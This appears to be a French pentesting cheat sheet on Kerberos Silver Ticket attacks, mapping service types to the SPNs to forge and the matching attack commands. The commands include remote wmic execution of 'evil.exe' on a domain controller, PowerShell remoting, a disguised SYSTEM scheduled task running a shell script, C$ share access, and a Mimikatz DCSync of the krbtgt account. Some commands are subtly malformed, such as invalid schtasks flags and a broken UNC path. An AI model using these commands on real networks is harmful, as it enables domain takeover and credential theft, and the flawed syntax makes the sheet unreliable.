Silver Ticket
Service à cibler lors de demande de TGS :
Type de service
Service Silver Ticket
Attaques
SWMI
HOST + RPCSS
wmic.exe /authority:"kerberos:DOMAIN\DC01" /node:"DC01" process call create "cmd /c evil.exe"
Powershell Remoting
HTTP + WSMAN
New-PSSESSION -NAME PSC -ComputerName DC01; Enter-PSSession -Name PSC
WinRM
HTTP + WSMAN
New-PSSESSION -NAME PSC -ComputerName DC01; Enter-PSSession -Name PSC
Scheduled Tasks
HOST
schtasks /create /s dc01 /SC WEEKLY /RU "NT Authority\System" /IN "SCOM Agent Health Check" /IR "C:/shell.ps1"
Windows File Share (CIFS)
CIFS
dir \dc01\c$
LDAP operations including Mimikatz DCSync
LDAP
lsadump::dcsync /dc:dc01 /domain:domain.local /user:krbtgt
Windows Remote Server Administration Tools
RPCSS + LDAP + CIFS
Last updated